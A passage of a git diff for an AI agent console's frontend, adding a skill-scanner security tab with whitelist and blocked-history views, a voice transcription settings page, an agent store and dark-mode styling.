    String(idx)} + pagination={false} + size="small" + /> + )} + + + ), + }, + { + key: "whitelist", + label: ( + + {t("security.skillScanner.whitelist.title")} + {whitelist.length > 0 && ( + {whitelist.length} + )} + + ), + children: ( +
    + + {whitelist.length === 0 ? ( +
    + + {t("security.skillScanner.whitelist.empty")} + + } + /> +
    + ) : ( +
    + )} + + + ), + }, + ]} + /> + + + setFindingsModal({ open: false, findings: [], skillName: "" }) + } + /> + + ); +} diff --git a/console/src/pages/Settings/Security/components/index.ts b/console/src/pages/Settings/Security/components/index.ts index ee4af737f..3262bffc0 100644 --- a/console/src/pages/Settings/Security/components/index.ts +++ b/console/src/pages/Settings/Security/components/index.ts @@ -2,3 +2,4 @@ export * from "./PageHeader"; export * from "./RuleTable"; export * from "./RuleModal"; export * from "./PreviewModal"; +export * from "./SkillScannerSection"; diff --git a/console/src/pages/Settings/Security/index.module.less b/console/src/pages/Settings/Security/index.module.less index 6f4b09eb0..282dc28d2 100644 --- a/console/src/pages/Settings/Security/index.module.less +++ b/console/src/pages/Settings/Security/index.module.less @@ -7,13 +7,13 @@ /* ---- Header Section ---- */ .header { - margin-bottom: 24px; + margin-bottom: 20px; } .title { - font-size: 24px; - font-weight: 600; - margin: 0 0 8px 0; + font-size: 22px; + font-weight: 700; + margin: 0 0 6px 0; color: #1a1a1a; } @@ -28,12 +28,159 @@ width: 100%; } +/* ---- Main Tabs (Tool Guard / Skill Scanner) ---- */ +.mainTabs { + :global(.copaw-tabs-nav) { + margin-bottom: 20px; + + &::before { + border-bottom: 1px solid #f0f0f0; + } + } + + :global(.copaw-tabs-tab) { + padding: 10px 4px; + font-size: 14px; + font-weight: 500; + color: #666 !important; + + &:hover { + color: #615ced !important; + } + } + + :global(.copaw-tabs-tab-active .copaw-tabs-tab-btn) { + color: #615ced !important; + font-weight: 600; + } + + :global(.copaw-tabs-ink-bar) { + background: #615ced !important; + height: 3px; + border-radius: 2px 2px 0 0; + } +} + +:global(.dark-mode) { + .mainTabs { + :global(.copaw-tabs-tab .copaw-tabs-tab-btn) { + color: #ffffff !important; + } + + :global(.copaw-tabs-tab-active .copaw-tabs-tab-btn) { + color: #8b87f5 !important; + font-weight: 600; + } + + :global(.copaw-tabs-ink-bar) { + 
background: #8b87f5 !important; + } + } + + .innerTabs { + :global(.copaw-tabs-tab .copaw-tabs-tab-btn) { + color: #ffffff !important; + } + + :global(.copaw-tabs-tab-active .copaw-tabs-tab-btn) { + color: #8b87f5 !important; + } + + :global(.copaw-tabs-ink-bar) { + background: #8b87f5 !important; + } + } + + .tabDescription { + color: rgba(255, 255, 255, 0.45); + } + + .footerButtons { + border-top-color: rgba(255, 255, 255, 0.1); + } +} + +.tabLabel { + display: inline-flex; + align-items: center; + gap: 6px; + font-size: 14px; +} + +.tabContent { + padding-top: 4px; +} + +.tabDescription { + font-size: 14px; + color: #888; + margin: 0 0 20px 0; + line-height: 1.6; +} + +/* ---- Inner Tabs (Scan Alerts / Whitelist) ---- */ +.innerTabs { + margin-top: 20px; + + :global(.copaw-tabs-nav) { + margin-bottom: 16px; + + &::before { + border-bottom: 1px solid #f0f0f0; + } + } + + :global(.copaw-tabs-tab) { + font-size: 13px; + font-weight: 500; + color: #666 !important; + + &:hover { + color: #615ced !important; + } + } + + :global(.copaw-tabs-tab-active .copaw-tabs-tab-btn) { + color: #615ced !important; + } + + :global(.copaw-tabs-ink-bar) { + background: #615ced !important; + } +} + +.tabBadge { + display: inline-flex; + align-items: center; + justify-content: center; + background: #ff4d4f; + color: #fff; + font-size: 11px; + font-weight: 600; + min-width: 18px; + height: 18px; + border-radius: 9px; + padding: 0 5px; + margin-left: 6px; + line-height: 18px; +} + +.tabPanelContent { + padding-top: 4px; +} + +.tabPanelHeader { + display: flex; + justify-content: flex-end; + margin-bottom: 12px; +} + /* ---- Cards ---- */ .formCard { - margin-bottom: 32px; - border-radius: 16px; + margin-bottom: 20px; + border-radius: 12px; border: 1px solid #e8e8e8; - box-shadow: 0 2px 8px rgba(0, 0, 0, 0.04); + box-shadow: 0 1px 4px rgba(0, 0, 0, 0.04); transition: all 0.2s ease-in-out; &:hover { @@ -42,7 +189,7 @@ } :global(.ant-card-body) { - padding: 24px; + padding: 20px 24px; } } 
@@ -72,7 +219,7 @@ } .sectionTitle { - font-size: 18px; + font-size: 16px; font-weight: 600; margin: 0; color: #1a1a1a; @@ -80,10 +227,10 @@ /* ---- Table Card ---- */ .tableCard { - margin-bottom: 24px; - border-radius: 16px; + margin-bottom: 0; + border-radius: 12px; border: 1px solid #e8e8e8; - box-shadow: 0 2px 8px rgba(0, 0, 0, 0.04); + box-shadow: 0 1px 4px rgba(0, 0, 0, 0.04); transition: all 0.2s ease-in-out; &:hover { @@ -96,7 +243,7 @@ } :global(.ant-table) { - border-radius: 16px; + border-radius: 12px; } :global(.ant-table-thead > tr > th) { @@ -110,7 +257,50 @@ } } -/* ---- Footer Buttons ---- */ +/* ---- Skill Scanner Config ---- */ +.skillScannerConfig { + display: grid; + grid-template-columns: repeat(auto-fit, minmax(280px, 1fr)); + gap: 0; +} + +.skillScannerConfigItem { + display: flex; + align-items: center; + justify-content: space-between; + gap: 12px; + padding-right: 24px; +} + +.skillScannerConfigItem + .skillScannerConfigItem { + padding-right: 0; + padding-left: 24px; + border-left: 1px solid var(--ant-color-border, #f0f0f0); +} + +.skillScannerLabel { + font-weight: 500; + flex-shrink: 0; +} + +.emptyState { + padding: 40px 24px; + display: flex; + justify-content: center; +} + +.emptyText { + color: #999; +} + +:global(.dark-mode) .emptyText { + color: rgba(255, 255, 255, 0.45); +} + +.codeHash { + font-size: 12px; +} + .footerButtons { display: flex; justify-content: flex-end; diff --git a/console/src/pages/Settings/Security/index.tsx b/console/src/pages/Settings/Security/index.tsx index db8ac913f..bf100d1c7 100644 --- a/console/src/pages/Settings/Security/index.tsx +++ b/console/src/pages/Settings/Security/index.tsx @@ -6,12 +6,23 @@ import { Card, Select, message, + Tabs, } from "@agentscope-ai/design"; -import { PlusCircleOutlined } from "@ant-design/icons"; +import { + PlusCircleOutlined, + SafetyOutlined, + ScanOutlined, +} from "@ant-design/icons"; import { useTranslation } from "react-i18next"; import api from "../../../api"; 
import { useToolGuard, type MergedRule } from "./useToolGuard"; -import { PageHeader, RuleTable, RuleModal, PreviewModal } from "./components"; +import { + PageHeader, + RuleTable, + RuleModal, + PreviewModal, + SkillScannerSection, +} from "./components"; import styles from "./index.module.less"; const BUILTIN_TOOLS = [ @@ -19,6 +30,7 @@ const BUILTIN_TOOLS = [ "execute_python_code", "browser_use", "desktop_screenshot", + "view_image", "read_file", "write_file", "edit_file", @@ -203,94 +215,139 @@ function SecurityPage() {
    - -
    - - setEnabled(val)} /> - + + + {t("security.toolGuardTitle")} + + ), + children: ( +
    +

    + {t("security.toolGuardDescription")} +

    - - - - - + + + + + - - - +
    +

    + {t("security.rules.title")} +

    + +
    -
    - - -
    + + + + +
    + + +
    +
    + ), + }, + { + key: "skillScanner", + label: ( + + + {t("security.skillScanner.title")} + + ), + children: ( +
    +

    + {t("security.skillScanner.description")} +

    + +
    + ), + }, + ]} + />
    (null); + const [blockedHistory, setBlockedHistory] = useState( + [], + ); + const [loading, setLoading] = useState(true); + const [error, setError] = useState(null); + + const fetchAll = useCallback(async () => { + setLoading(true); + setError(null); + try { + const [cfg, history] = await Promise.all([ + api.getSkillScanner(), + api.getBlockedHistory(), + ]); + setConfig(cfg); + setBlockedHistory(history); + } catch (err) { + const msg = + err instanceof Error + ? err.message + : "Failed to load skill scanner config"; + console.error("Failed to load skill scanner:", err); + setError(msg); + } finally { + setLoading(false); + } + }, []); + + useEffect(() => { + fetchAll(); + }, [fetchAll]); + + const updateConfig = useCallback( + async (updates: Partial) => { + if (!config) return; + const newConfig = { ...config, ...updates }; + try { + const saved = await api.updateSkillScanner(newConfig); + setConfig(saved); + return true; + } catch (err) { + console.error("Failed to update skill scanner config:", err); + return false; + } + }, + [config], + ); + + const addToWhitelist = useCallback( + async (skillName: string, contentHash: string = "") => { + try { + await api.addToWhitelist(skillName, contentHash); + await fetchAll(); + return true; + } catch (err) { + console.error("Failed to add to whitelist:", err); + return false; + } + }, + [fetchAll], + ); + + const removeFromWhitelist = useCallback( + async (skillName: string) => { + try { + await api.removeFromWhitelist(skillName); + await fetchAll(); + return true; + } catch (err) { + console.error("Failed to remove from whitelist:", err); + return false; + } + }, + [fetchAll], + ); + + const removeBlockedEntry = useCallback( + async (index: number) => { + try { + await api.removeBlockedEntry(index); + await fetchAll(); + return true; + } catch (err) { + console.error("Failed to remove blocked entry:", err); + return false; + } + }, + [fetchAll], + ); + + const clearBlockedHistory = useCallback(async () => { + try 
{ + await api.clearBlockedHistory(); + setBlockedHistory([]); + return true; + } catch (err) { + console.error("Failed to clear blocked history:", err); + return false; + } + }, []); + + const whitelist: SkillScannerWhitelistEntry[] = config?.whitelist ?? []; + + return { + config, + blockedHistory, + whitelist, + loading, + error, + fetchAll, + updateConfig, + addToWhitelist, + removeFromWhitelist, + removeBlockedEntry, + clearBlockedHistory, + }; +} diff --git a/console/src/pages/Settings/TokenUsage/index.module.less b/console/src/pages/Settings/TokenUsage/index.module.less index a5e486d1f..5772b5ca1 100644 --- a/console/src/pages/Settings/TokenUsage/index.module.less +++ b/console/src/pages/Settings/TokenUsage/index.module.less @@ -5,7 +5,7 @@ /* ---- Section (same as Models / Environments) ---- */ .section { - margin-bottom: 32px; + margin-bottom: 24px; } .section:last-child { @@ -132,3 +132,48 @@ font-family: "SF Mono", "Menlo", monospace; font-size: 13px; } + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .sectionDesc { + color: rgba(255, 255, 255, 0.35); + } + + .loadingText { + color: rgba(255, 255, 255, 0.35); + } + + .emptyState { + color: rgba(255, 255, 255, 0.25); + } + + /* Summary cards */ + .cardValue { + color: rgba(255, 255, 255, 0.85); + } + + .cardLabel { + color: rgba(255, 255, 255, 0.35); + } + + /* Data table */ + .table { + th, + td { + border-bottom-color: rgba(255, 255, 255, 0.06); + } + + th { + color: rgba(255, 255, 255, 0.4); + background: rgba(255, 255, 255, 0.03); + } + + td { + color: rgba(255, 255, 255, 0.75); + } + + tbody tr:hover { + background: rgba(255, 255, 255, 0.04); + } + } +} diff --git a/console/src/pages/Settings/VoiceTranscription/index.module.less b/console/src/pages/Settings/VoiceTranscription/index.module.less new file mode 100644 index 000000000..b2b0f7b36 --- /dev/null +++ b/console/src/pages/Settings/VoiceTranscription/index.module.less @@ -0,0 +1,95 @@ 
+.page { + padding: 24px; + height: 100%; + overflow-y: auto; + width: 100%; +} + +.header { + display: flex; + justify-content: space-between; + align-items: center; + margin-bottom: 24px; +} + +.title { + font-size: 24px; + font-weight: 600; + margin: 0 0 8px 0; + color: #000; +} + +.description { + font-size: 14px; + color: #666; + margin: 0; +} + +.card { + width: 100%; + margin-bottom: 16px; + + &:hover { + border: 1px solid #615ced; + box-shadow: 0 12px 32px rgba(0, 0, 0, 0.08); + } +} + +.cardTitle { + font-size: 16px; + font-weight: 600; + margin: 0 0 4px 0; +} + +.cardDescription { + font-size: 13px; + color: #888; + margin: 0 0 16px 0; +} + +.optionLabel { + font-weight: 500; + margin-right: 8px; +} + +.optionDescription { + font-size: 13px; + color: #888; +} + +.centerState { + display: flex; + flex-direction: column; + align-items: center; + justify-content: center; + height: 400px; +} + +.footerActions { + display: flex; + justify-content: flex-end; + align-items: center; + padding: 16px 24px; +} + +:global(.dark-mode) { + .title { + color: rgba(255, 255, 255, 0.88); + } + + .description { + color: rgba(255, 255, 255, 0.45); + } + + .cardDescription { + color: rgba(255, 255, 255, 0.45); + } + + .optionLabel { + color: rgba(255, 255, 255, 0.88); + } + + .optionDescription { + color: rgba(255, 255, 255, 0.45); + } +} diff --git a/console/src/pages/Settings/VoiceTranscription/index.tsx b/console/src/pages/Settings/VoiceTranscription/index.tsx new file mode 100644 index 000000000..3a5b63cb3 --- /dev/null +++ b/console/src/pages/Settings/VoiceTranscription/index.tsx @@ -0,0 +1,287 @@ +import { useEffect, useState } from "react"; +import { Button, Card, message } from "@agentscope-ai/design"; +import { Radio, Select, Space, Spin, Alert } from "antd"; +import { useTranslation } from "react-i18next"; +import api from "../../../api"; +import styles from "./index.module.less"; + +interface TranscriptionProvider { + id: string; + name: string; + available: 
boolean;
+}
+
+interface LocalWhisperStatus {
+  available: boolean;
+  ffmpeg_installed: boolean;
+  whisper_installed: boolean;
+}
+
+function VoiceTranscriptionPage() {
+  const { t } = useTranslation();
+  const [loading, setLoading] = useState(true);
+  const [saving, setSaving] = useState(false);
+  const [audioMode, setAudioMode] = useState("auto");
+  const [providerType, setProviderType] = useState("disabled");
+  const [providers, setProviders] = useState<TranscriptionProvider[]>([]);
+  const [selectedProviderId, setSelectedProviderId] = useState("");
+  const [localWhisperStatus, setLocalWhisperStatus] =
+    useState<LocalWhisperStatus | null>(null);
+
+  const fetchSettings = async () => {
+    setLoading(true);
+    try {
+      const [modeRes, provTypeRes, provRes, lwStatus] = await Promise.all([
+        api.getAudioMode(),
+        api.getTranscriptionProviderType(),
+        api.getTranscriptionProviders(),
+        api.getLocalWhisperStatus(),
+      ]);
+      setAudioMode(modeRes.audio_mode ?? "auto");
+      setProviderType(provTypeRes.transcription_provider_type ?? "disabled");
+      setProviders(provRes.providers ?? []);
+      setSelectedProviderId(provRes.configured_provider_id ?? "");
+      setLocalWhisperStatus(lwStatus);
+    } catch (err) {
+      console.error("Failed to load voice transcription settings:", err);
+      message.error(t("voiceTranscription.loadFailed"));
+    } finally {
+      setLoading(false);
+    }
+  };
+
+  useEffect(() => {
+    fetchSettings();
+  }, []);
+
+  const handleSave = async () => {
+    setSaving(true);
+    try {
+      const promises: Promise<unknown>[] = [
+        api.updateAudioMode(audioMode),
+        api.updateTranscriptionProviderType(providerType),
+      ];
+      if (providerType === "whisper_api") {
+        promises.push(api.updateTranscriptionProvider(selectedProviderId));
+      }
+      await Promise.all(promises);
+      message.success(t("voiceTranscription.saveSuccess"));
+    } catch (err) {
+      console.error("Failed to save voice transcription settings:", err);
+      message.error(t("voiceTranscription.saveFailed"));
+    } finally {
+      setSaving(false);
+    }
+  };
+
+  if (loading) {
+    return (
+
    +
    + +
    +
    + ); + } + + const availableProviders = providers.filter((p) => p.available); + const showProviderSection = audioMode !== "native"; + const isLocalWhisper = providerType === "local_whisper"; + const isWhisperApi = providerType === "whisper_api"; + + return ( +
    +
    +
    +

    {t("voiceTranscription.title")}

    +

    + {t("voiceTranscription.description")} +

    +
    +
    + + +

    + {t("voiceTranscription.audioModeLabel")} +

    +

    + {t("voiceTranscription.audioModeDescription")} +

    + setAudioMode(e.target.value)} + > + + + + {t("voiceTranscription.modeAuto")} + + + {t("voiceTranscription.modeAutoDesc")} + + + + + {t("voiceTranscription.modeNative")} + + + {t("voiceTranscription.modeNativeDesc")} + + + + + + {audioMode === "native" && localWhisperStatus && ( +
    + {localWhisperStatus.ffmpeg_installed ? ( + + ) : ( + + )} +
    + )} +
    + + {showProviderSection && ( + <> + +

    + {t("voiceTranscription.providerTypeLabel")} +

    +

    + {t("voiceTranscription.providerTypeDescription")} +

    + setProviderType(e.target.value)} + > + + + + {t("voiceTranscription.providerTypeDisabled")} + + + {t("voiceTranscription.providerTypeDisabledDesc")} + + + + + {t("voiceTranscription.providerTypeWhisperApi")} + + + {t("voiceTranscription.providerTypeWhisperApiDesc")} + + + + + {t("voiceTranscription.providerTypeLocalWhisper")} + + + {t("voiceTranscription.providerTypeLocalWhisperDesc")} + + + + + + {isLocalWhisper && localWhisperStatus && ( +
    + {localWhisperStatus.available ? ( + + ) : ( + + )} +
    + )} +
    + + {isWhisperApi && ( + +

    + {t("voiceTranscription.providerLabel")} +

    +

    + {t("voiceTranscription.providerDescription")} +

    + + {availableProviders.length === 0 ? ( + + ) : ( + + )} +
    + )} + + )} + + + +
    + + +
    +
    + ); +} + +export default VoiceTranscriptionPage; diff --git a/console/src/stores/agentStore.ts b/console/src/stores/agentStore.ts new file mode 100644 index 000000000..bfb800e61 --- /dev/null +++ b/console/src/stores/agentStore.ts @@ -0,0 +1,46 @@ +import { create } from "zustand"; +import { persist } from "zustand/middleware"; +import type { AgentSummary } from "../api/types/agents"; + +interface AgentStore { + selectedAgent: string; + agents: AgentSummary[]; + setSelectedAgent: (agentId: string) => void; + setAgents: (agents: AgentSummary[]) => void; + addAgent: (agent: AgentSummary) => void; + removeAgent: (agentId: string) => void; + updateAgent: (agentId: string, updates: Partial) => void; +} + +export const useAgentStore = create()( + persist( + (set) => ({ + selectedAgent: "default", + agents: [], + + setSelectedAgent: (agentId) => set({ selectedAgent: agentId }), + + setAgents: (agents) => set({ agents }), + + addAgent: (agent) => + set((state) => ({ + agents: [...state.agents, agent], + })), + + removeAgent: (agentId) => + set((state) => ({ + agents: state.agents.filter((a) => a.id !== agentId), + })), + + updateAgent: (agentId, updates) => + set((state) => ({ + agents: state.agents.map((a) => + a.id === agentId ? 
{ ...a, ...updates } : a, + ), + })), + }), + { + name: "copaw-agent-storage", + }, + ), +); diff --git a/console/src/styles/layout.css b/console/src/styles/layout.css index c08207a03..45f19d4ea 100644 --- a/console/src/styles/layout.css +++ b/console/src/styles/layout.css @@ -6,6 +6,657 @@ body { padding: 0; } +/* ─── Dark mode global token overrides ─────────────────────────────────────── */ +html.dark-mode { + color-scheme: dark; +} + +html.dark-mode body { + background: #141414; + color: rgba(255, 255, 255, 0.85); +} + +/* Ant Design layout background in dark mode */ +html.dark-mode .ant-layout, +html.dark-mode .copaw-layout { + background: #141414 !important; +} + +html.dark-mode .ant-layout-content, +html.dark-mode .copaw-layout-content { + background: #141414 !important; +} + +/* Page content area background */ +html.dark-mode .page-content { + background: #141414; +} + +/* Card components — @agentscope-ai/design uses copaw prefix */ +html.dark-mode .copaw-card, +html.dark-mode .ant-card { + background: #1f1f1f !important; + border-color: rgba(255, 255, 255, 0.1) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-card-head, +html.dark-mode .ant-card-head { + background: #1f1f1f !important; + border-bottom-color: rgba(255, 255, 255, 0.08) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-card-head-title, +html.dark-mode .ant-card-head-title { + color: rgba(255, 255, 255, 0.85) !important; +} + +/* @agentscope-ai/design Card custom title (sparkPrefix-title inside card-wrapper) */ +html.dark-mode .copaw-card-wrapper .copaw-title, +html.dark-mode .copaw-spark-title { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-card-wrapper .copaw-info, +html.dark-mode .copaw-spark-info { + color: rgba(255, 255, 255, 0.35) !important; +} + +html.dark-mode .copaw-card-body, +html.dark-mode .ant-card-body { + background: #1f1f1f !important; +} + +/* Table components */ 
+html.dark-mode .copaw-table, +html.dark-mode .ant-table { + background: #1f1f1f !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-table-wrapper, +html.dark-mode .ant-table-wrapper { + background: #1f1f1f !important; +} + +html.dark-mode .copaw-table-thead > tr > th, +html.dark-mode .ant-table-thead > tr > th, +html.dark-mode .copaw-table-thead > tr > td, +html.dark-mode .ant-table-thead > tr > td { + background: #262626 !important; + color: rgba(255, 255, 255, 0.65) !important; + border-bottom-color: rgba(255, 255, 255, 0.08) !important; +} + +html.dark-mode .copaw-table-tbody > tr > td, +html.dark-mode .ant-table-tbody > tr > td { + background: #1f1f1f !important; + color: rgba(255, 255, 255, 0.85) !important; + border-bottom-color: rgba(255, 255, 255, 0.06) !important; +} + +html.dark-mode .copaw-table-tbody > tr:hover > td, +html.dark-mode .ant-table-tbody > tr:hover > td { + background: #2a2a2a !important; +} + +html.dark-mode .copaw-table-tbody > tr.copaw-table-row-selected > td, +html.dark-mode .ant-table-tbody > tr.ant-table-row-selected > td { + background: rgba(97, 92, 237, 0.12) !important; +} + +/* Table fixed columns shadow in dark mode */ +html.dark-mode .copaw-table-cell-fix-right, +html.dark-mode .ant-table-cell-fix-right { + background: #1f1f1f !important; +} + +html.dark-mode .copaw-table-cell-fix-right-first::after, +html.dark-mode .ant-table-cell-fix-right-first::after { + box-shadow: inset -10px 0 8px -8px rgba(0, 0, 0, 0.45) !important; +} + +/* Table pagination */ +html.dark-mode .copaw-pagination .copaw-pagination-item, +html.dark-mode .ant-pagination .ant-pagination-item { + background: #1f1f1f !important; + border-color: rgba(255, 255, 255, 0.1) !important; +} + +html.dark-mode .copaw-pagination .copaw-pagination-item a, +html.dark-mode .ant-pagination .ant-pagination-item a { + color: rgba(255, 255, 255, 0.65) !important; +} + +html.dark-mode .copaw-pagination .copaw-pagination-item-active, 
+html.dark-mode .ant-pagination .ant-pagination-item-active { + background: #615ced !important; + border-color: #615ced !important; +} + +html.dark-mode .copaw-pagination .copaw-pagination-item-active a, +html.dark-mode .ant-pagination .ant-pagination-item-active a { + color: #fff !important; +} + +html.dark-mode .copaw-pagination .copaw-pagination-prev button, +html.dark-mode .copaw-pagination .copaw-pagination-next button, +html.dark-mode .ant-pagination .ant-pagination-prev button, +html.dark-mode .ant-pagination .ant-pagination-next button { + background: #1f1f1f !important; + border-color: rgba(255, 255, 255, 0.1) !important; + color: rgba(255, 255, 255, 0.65) !important; +} + +/* Table sorter icons */ +html.dark-mode .copaw-table-column-sorter, +html.dark-mode .ant-table-column-sorter { + color: rgba(255, 255, 255, 0.3) !important; +} + +html.dark-mode .copaw-table-column-sorter-up.active, +html.dark-mode .copaw-table-column-sorter-down.active, +html.dark-mode .ant-table-column-sorter-up.active, +html.dark-mode .ant-table-column-sorter-down.active { + color: #8b87f0 !important; +} + +/* Checkbox in table */ +html.dark-mode .copaw-checkbox-inner, +html.dark-mode .ant-checkbox-inner { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.2) !important; +} + +html.dark-mode .copaw-checkbox-checked .copaw-checkbox-inner, +html.dark-mode .ant-checkbox-checked .ant-checkbox-inner { + background: #615ced !important; + border-color: #615ced !important; +} + +/* Page titles (h1) */ +html.dark-mode h1, +html.dark-mode h2, +html.dark-mode h3 { + color: rgba(255, 255, 255, 0.85); +} + +/* Input / Textarea */ +html.dark-mode .copaw-input, +html.dark-mode .ant-input { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.15) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +/* Disabled input */ +html.dark-mode .copaw-input[disabled], +html.dark-mode .ant-input[disabled], +html.dark-mode .copaw-input-disabled, 
+html.dark-mode .ant-input-disabled { + background: rgba(255, 255, 255, 0.04) !important; + border-color: rgba(255, 255, 255, 0.08) !important; + color: rgba(255, 255, 255, 0.4) !important; + cursor: not-allowed; +} + +/* Disabled InputNumber */ +html.dark-mode .copaw-input-number-disabled, +html.dark-mode .ant-input-number-disabled, +html.dark-mode .copaw-input-number-disabled .copaw-input-number-input, +html.dark-mode .ant-input-number-disabled .ant-input-number-input { + background: rgba(255, 255, 255, 0.04) !important; + border-color: rgba(255, 255, 255, 0.08) !important; + color: rgba(255, 255, 255, 0.4) !important; +} + +html.dark-mode .copaw-input::placeholder, +html.dark-mode .ant-input::placeholder { + color: rgba(255, 255, 255, 0.25) !important; +} + +html.dark-mode .copaw-input-affix-wrapper, +html.dark-mode .ant-input-affix-wrapper { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.15) !important; +} + +/* Select */ +html.dark-mode .copaw-select-selector, +html.dark-mode .ant-select-selector { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.15) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-select-selection-placeholder, +html.dark-mode .ant-select-selection-placeholder { + color: rgba(255, 255, 255, 0.25) !important; +} + +html.dark-mode .copaw-select-arrow, +html.dark-mode .ant-select-arrow { + color: rgba(255, 255, 255, 0.3) !important; +} + +/* Select dropdown */ +html.dark-mode .copaw-select-dropdown, +html.dark-mode .ant-select-dropdown { + background: #1f1f1f !important; + border-color: rgba(255, 255, 255, 0.1) !important; +} + +html.dark-mode .copaw-select-item, +html.dark-mode .ant-select-item { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-select-item-option-active, +html.dark-mode .ant-select-item-option-active { + background: rgba(97, 92, 237, 0.12) !important; +} + +html.dark-mode .copaw-select-item-option-selected, 
+html.dark-mode .ant-select-item-option-selected { + background: rgba(97, 92, 237, 0.2) !important; + color: #8b87f0 !important; +} + +/* Form labels */ +html.dark-mode .copaw-form-item-label > label, +html.dark-mode .ant-form-item-label > label { + color: rgba(255, 255, 255, 0.65) !important; +} + +html.dark-mode .copaw-form-item-required::before, +html.dark-mode .ant-form-item-required::before { + color: #ff4d4f !important; +} + +/* InputNumber */ +html.dark-mode .copaw-input-number, +html.dark-mode .ant-input-number { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.15) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-input-number-input, +html.dark-mode .ant-input-number-input { + background: #2a2a2a !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-input-number-handler-wrap, +html.dark-mode .ant-input-number-handler-wrap { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.1) !important; +} + +html.dark-mode .copaw-input-number-handler, +html.dark-mode .ant-input-number-handler { + color: rgba(255, 255, 255, 0.45) !important; + border-color: rgba(255, 255, 255, 0.1) !important; +} + +/* TimePicker */ +html.dark-mode .copaw-picker, +html.dark-mode .ant-picker { + background: #2a2a2a !important; + border-color: rgba(255, 255, 255, 0.15) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-picker-input > input, +html.dark-mode .ant-picker-input > input { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-picker-suffix, +html.dark-mode .ant-picker-suffix { + color: rgba(255, 255, 255, 0.3) !important; +} + +html.dark-mode .copaw-picker-dropdown, +html.dark-mode .ant-picker-dropdown { + background: #1f1f1f !important; +} + +html.dark-mode .copaw-picker-panel, +html.dark-mode .ant-picker-panel { + background: #1f1f1f !important; + border-color: rgba(255, 255, 255, 0.1) !important; +} + 
+html.dark-mode .copaw-picker-time-panel-cell-inner, +html.dark-mode .ant-picker-time-panel-cell-inner { + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode + .copaw-picker-time-panel-cell-selected + .copaw-picker-time-panel-cell-inner, +html.dark-mode + .ant-picker-time-panel-cell-selected + .ant-picker-time-panel-cell-inner { + background: rgba(97, 92, 237, 0.2) !important; + color: #8b87f0 !important; +} + +/* DatePicker / RangePicker calendar panel */ +html.dark-mode .copaw-picker-dropdown, +html.dark-mode .ant-picker-dropdown { + background: transparent !important; +} + +html.dark-mode .copaw-picker-panel-container, +html.dark-mode .ant-picker-panel-container { + background: #1f1f1f !important; + border: 1px solid rgba(255, 255, 255, 0.1) !important; + box-shadow: 0 8px 24px rgba(0, 0, 0, 0.5) !important; +} + +/* Header (month/year nav) */ +html.dark-mode .copaw-picker-header, +html.dark-mode .ant-picker-header { + border-bottom-color: rgba(255, 255, 255, 0.08) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +html.dark-mode .copaw-picker-header-view button, +html.dark-mode .ant-picker-header-view button, +html.dark-mode .copaw-picker-prev-icon, +html.dark-mode .copaw-picker-next-icon, +html.dark-mode .copaw-picker-super-prev-icon, +html.dark-mode .copaw-picker-super-next-icon, +html.dark-mode .ant-picker-prev-icon, +html.dark-mode .ant-picker-next-icon, +html.dark-mode .ant-picker-super-prev-icon, +html.dark-mode .ant-picker-super-next-icon { + color: rgba(255, 255, 255, 0.65) !important; +} + +html.dark-mode .copaw-picker-header button:hover, +html.dark-mode .ant-picker-header button:hover { + color: rgba(255, 255, 255, 0.85) !important; +} + +/* Week day labels (Su Mo Tu ...) 
*/ +html.dark-mode .copaw-picker-content th, +html.dark-mode .ant-picker-content th { + color: rgba(255, 255, 255, 0.35) !important; +} + +/* Normal date cells */ +html.dark-mode .copaw-picker-cell .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell .ant-picker-cell-inner { + color: rgba(255, 255, 255, 0.65) !important; +} + +html.dark-mode .copaw-picker-cell:hover .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell:hover .ant-picker-cell-inner { + background: rgba(97, 92, 237, 0.2) !important; + color: rgba(255, 255, 255, 0.85) !important; +} + +/* Outside-month cells */ +html.dark-mode .copaw-picker-cell-disabled .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell-disabled .ant-picker-cell-inner, +html.dark-mode .copaw-picker-cell-disabled, +html.dark-mode .ant-picker-cell-disabled { + color: rgba(255, 255, 255, 0.2) !important; +} + +/* Today marker */ +html.dark-mode .copaw-picker-cell-today .copaw-picker-cell-inner::before, +html.dark-mode .ant-picker-cell-today .ant-picker-cell-inner::before { + border-color: #615ced !important; +} + +/* Selected start/end cell */ +html.dark-mode .copaw-picker-cell-selected .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell-selected .ant-picker-cell-inner, +html.dark-mode .copaw-picker-cell-range-start .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell-range-start .ant-picker-cell-inner, +html.dark-mode .copaw-picker-cell-range-end .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell-range-end .ant-picker-cell-inner { + background: #615ced !important; + color: #fff !important; +} + +/* Range in-between cells */ +html.dark-mode .copaw-picker-cell-in-range::before, +html.dark-mode .ant-picker-cell-in-range::before { + background: rgba(97, 92, 237, 0.15) !important; +} + +html.dark-mode .copaw-picker-cell-in-range .copaw-picker-cell-inner, +html.dark-mode .ant-picker-cell-in-range .ant-picker-cell-inner { + color: rgba(255, 255, 255, 0.85) !important; +} + +/* Range hover preview */ 
